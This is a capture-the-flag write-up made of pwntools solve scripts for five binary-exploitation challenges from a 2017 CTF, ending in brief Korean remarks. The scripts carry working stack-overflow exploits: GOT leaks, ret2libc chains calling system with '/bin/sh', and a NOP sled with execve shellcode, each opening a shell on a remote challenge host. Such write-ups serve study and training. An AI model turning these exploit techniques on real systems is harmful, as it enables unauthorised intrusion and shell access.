2017 Hust CTF write up
# Solve script for the "attackme" binary: a two-stage stack overflow that first
# makes the service print the runtime address of write() and then returns into
# libc using addresses derived from that leak.
# NOTE(review): payloads are built by adding str literals to p32() output, so
# this appears to be written for Python 2 - confirm.
from pwn import *
import sys

elf = ELF("./attackme")
#libc = ELF("libc-2.23.so")

# Gadget addresses hard-coded from the binary. They are only valid if the
# binary is mapped at a fixed base (presumably built without PIE - TODO confirm).
pop3ret = 0x80485f9
pop2ret = 0x80485fa  # defined but never used below

# argv[1] selects the target: "1" = remote service, "0" = local process.
# Any other value leaves `s` undefined, so leak() fails with NameError;
# a missing argument raises IndexError on this line.
if sys.argv[1] == "1":
    s = remote("223.194.105.182", 37100)
elif sys.argv[1] == "0":
    s = process("./attackme")

def leak():
    """Leak write()'s address, derive two libc addresses from it, send stage two."""
    s.recvuntil("Press any thing\n")

    # Stage 1: 104 filler bytes, then a chain laid out as a call to
    # write(1, &GOT[write], 4), which prints write()'s resolved address.
    # That the chain is reached after 104 bytes suggests the target has no
    # stack canary - TODO confirm against the binary.
    pay = "A"*104
    pay += p32(elf.plt['write'])
    pay += p32(pop3ret)            # by its name, a pop/pop/pop/ret gadget that steps over the 3 arguments
    pay += p32(1)                  # fd argument
    pay += p32(elf.got['write'])   # buffer argument: the GOT slot of write
    pay += p32(4)                  # length argument: one 32-bit pointer
    pay += p32(0x0804852B)         # presumably re-enters the vulnerable routine, since the prompt is awaited again below - TODO confirm
    pay += p32(0)
    s.sendline(pay)
    s.recv(113)                    # discards the 113 bytes received before the leaked pointer (presumably program output - TODO confirm)
    write_add = u32(s.recv(4))
    s.recvuntil("Press any thing\n")

    # Fixed distances from write(); they match exactly one libc build
    # (the commented-out ELF() line above names libc-2.23.so), so a different
    # libc on the target breaks both values.
    sh_add = write_add + 0x85E3B
    system_add = write_add - 0x9AC50

    log.info("write_add : "+hex(write_add))
    log.info("sh_add : "+hex(sh_add))
    log.info("system_add : "+hex(system_add))

    # Stage 2: same 104-byte filler, then system_add, a zero word in the
    # return-address position, and sh_add as the single argument.
    pay1 = "A"*104
    pay1 += p32(system_add)
    pay1 += p32(0)
    pay1 += p32(sh_add)
    s.sendline(pay1)
    s.interactive()

if __name__ == '__main__':
    leak()
pwnable - RR2L(50p)
# Solve script for the "wind" binary: one overflow that sends 32 filler bytes
# followed by a single 4-byte address inside the binary.
from pwn import *
import sys

# argv[1] selects the target: "1" = remote service, "0" = local process.
# Any other value leaves `s` undefined (NameError in start()); a missing
# argument raises IndexError on this line.
if sys.argv[1] == "1":
    s = remote("223.194.105.182", 22901)
elif sys.argv[1] == "0":
    s = process("./wind")

def start():
    """Wait for the input prompt and send the 36-byte payload."""
    log.info("Wind Start func!")
    #s.recv(1024)
    s.recvuntil("[+] INPUT: ")
    pay = "A"*32
    # Presumably replaces a saved return address or function pointer located
    # 32 bytes into the input buffer - TODO confirm against the binary.
    # The fixed 0x0804.... value assumes a non-PIE load address.
    pay += p32(0x080487F9)
    s.sendline(pay)

if __name__ == '__main__':
    start()
    s.interactive()
pwnable - Wind(100p)
# Solve script for the "challenge" binary (captioned "heap" in the write-up):
# two inputs are sent, and the second one runs well past 200 bytes.
from pwn import *

#s = process('./challenge')
s = remote('223.194.105.182', 29001)
elf = ELF("./challenge")  # loaded but not referenced below

# First input: exactly 200 filler bytes.
payload = 'A'*200
#payload += p32(0x08048980)
s.sendline(payload)
s.recv(1024)

# Second input: 204 filler bytes, a zero word, the word 0x00020f31, 192 more
# filler bytes, then one address inside the binary.
pay1 = "A"*204
pay1 += p32(0)
pay1 += p32(0x00020f31)   # NOTE(review): looks like a heap chunk size field kept intact while writing across it - confirm
pay1 += "B"*192
pay1 += p32(0x08048986)   # presumably lands on a code pointer stored after the overflowed data - TODO confirm
s.sendline(pay1)
s.interactive()
pwnable - heap(100p)
# Solve script for the "ohmybof" challenge: a first payload makes the service
# send back 4 bytes, and a second payload uses addresses computed from them.
from pwn import *
import time  # imported but not used below

s = remote('223.194.105.182', 41001)
s.recv(1024)

# Stage 1: 24 filler bytes followed by two addresses in the binary's range.
# presumably 0x080483e3 is an output routine and 0x0804a00c a GOT slot whose
# contents get printed - TODO confirm against the binary.
payload = 'A'*24 + p32(0x080483e3) + p32(0x0804a00c)
s.sendline(payload)

# The 4 bytes received are read as a little-endian pointer and reduced by a
# fixed offset; the two values below are fixed offsets from that result.
# All three constants are tied to one specific libc build.
leaked = u32(s.recv(4)) - 0x18540
system_libc = leaked + 0x3ada0
binsh = leaked + 0x15b82b

# Stage 2: 24 filler bytes, the same binary address repeated four times
# (presumably a bare `ret` used as padding - TODO confirm), then system_libc,
# a 4-byte placeholder, and binsh as the argument.
payload_1 = 'A'*24 + p32(0x08048296)*4 + p32(system_libc) + 'AAAA' + p32(binsh)
s.sendline(payload_1)
s.interactive()
pwnable - ohmybof(100p)
# Solve script for the "earth" binary: a stack overflow that redirects
# execution to a hard-coded stack address followed by a long run of 0x90 bytes
# and a shellcode blob.
# NOTE(review): a fixed 0xbfff.... address with code placed in the input only
# works when the target's stack is executable and its address predictable,
# i.e. presumably NX and ASLR are both off on the target - confirm.
from pwn import *

#s = process("./earth")
s = remote("223.194.105.182", 22900)

# Opaque byte string reproduced as given in the write-up; not decoded here.
shellcode = "\xda\xd4\xba\x11\xf2\x16\x5f\xd9\x74\x24\xf4\x5e\x33\xc9\xb1\x0d\x31\x56\x18\x03\x56\x18\x83\xee\xed\x10\xe3\x35\x06\x8d\x95\x98\x7e\x45\x8b\x7f\xf7\x72\xbb\x50\x74\x15\x3c\xc7\x55\x87\x55\x79\x20\xa4\xf4\x6d\x3c\x2b\xf9\x6d\x6f\x49\x90\x03\x40\xee\x03\xa8\xbe\x96\xaf\x31\xd9\x56\x67\xe1\xac\xb6\x4a\x85\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

payload = "A" * 0x6c               # 0x6c (108) filler bytes
payload += "BBBB"                  # 4 more filler bytes (presumably the saved frame pointer slot - TODO confirm)
payload += p32(0xbfffec3c + 200)   # hard-coded stack address plus 200
payload += "\x90" * 2000           # 2000 bytes of 0x90 ahead of the shellcode
payload += shellcode

s.sendline(payload)
s.interactive()
pwnable - earth(100p)
pwnable - shellwedance(300p)
// 그냥 인젝션 문제
misc 한 문제를 또 봤는데 그건 그냥 import os가 돼서 패스.... 샌드박스 문제인데 필터링이 없다.
200점짜리 ROP인가.. 무튼 파일이 너무 더러웠다.... 공부하다가 stripped라는 것도 알게 돼서, 리버싱 쪽인 것 같지만 관련 문제를 한번 봐야 될 듯.